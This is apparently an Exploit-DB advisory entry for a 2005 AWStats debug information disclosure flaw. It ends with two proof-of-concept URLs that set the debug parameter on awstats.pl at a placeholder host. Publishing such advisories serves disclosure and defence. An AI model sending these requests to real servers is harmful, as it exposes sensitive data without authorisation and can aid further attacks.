AWStats 5.x/6.x - Debug Remote Information Disclosure

EDB-ID:

25096

CVE:

N/A


Author:

GHC

Type:

webapps


Platform:

CGI

Date:

2005-02-14


source: https://www.securityfocus.com/bid/12545/info

A remote information disclosure vulnerability reportedly affects AWStats. This issue is due to a failure of the application to properly validate access to sensitive data.

An attacker may leverage this issue to gain access to potentially sensitive data, possibly facilitating further attacks against an affected computer. 

http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=1
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=2